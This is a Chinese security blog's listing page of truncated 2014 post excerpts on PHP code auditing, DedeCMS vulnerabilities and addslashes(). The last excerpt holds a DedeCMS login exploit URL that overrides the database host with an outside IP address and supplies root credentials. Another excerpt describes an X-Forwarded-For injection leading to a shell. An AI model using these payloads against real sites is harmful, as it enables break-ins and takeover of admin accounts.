摘要:
在甲方公司做代码审计一般还是以白盒为主,漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露等。1.xss + sql注入 其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注入的过滤。写个过滤函数,可由如下所示:$_REQUEST = filter_xss($_REQUEST);$_GET = filter_xss($_GET);$_POST = filter_xss($_POST);$_COOKIE = filter_xss($_COOKIE);$_POST = filter_sql($_ 阅读全文
posted @ 2014-03-31 18:32
milantgh
阅读(873)
评论(0)
推荐(0)
摘要:
flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:在用户登陆后把用户信息写如了缓存:\include\inc_memberlogin.phpfunction FushCache($mid=0){if(empty($mid)) $mid = $this->M_ID;$dsql = new DedeSql();$row = $dsql->GetOne("Select ID,userid,pwd, 阅读全文
posted @ 2014-03-31 14:28
milantgh
阅读(462)
评论(0)
推荐(0)
摘要:
定义和用法addslashes() 函数在指定的预定义字符前添加反斜杠。这些预定义字符是:单引号 (')双引号 (")反斜杠 (\)NULL语法addslashes(string)参数描述string必需。规定要检查的字符串。提示和注释提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备合适的字符串。注释:默认情况下,PHP 指令 magic_quotes_gpc 为 on,对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。不要对已经被 magic_quotes_gpc 转义过的字符串使用 addslashes(),因为这样会导 阅读全文
posted @ 2014-03-31 14:23
milantgh
阅读(260)
评论(0)
推荐(0)
摘要:
简要描述:众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”详细说明:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0& 阅读全文
posted @ 2014-03-31 13:58
milantgh
阅读(441)
评论(0)
推荐(0)
浙公网安备 33010602011771号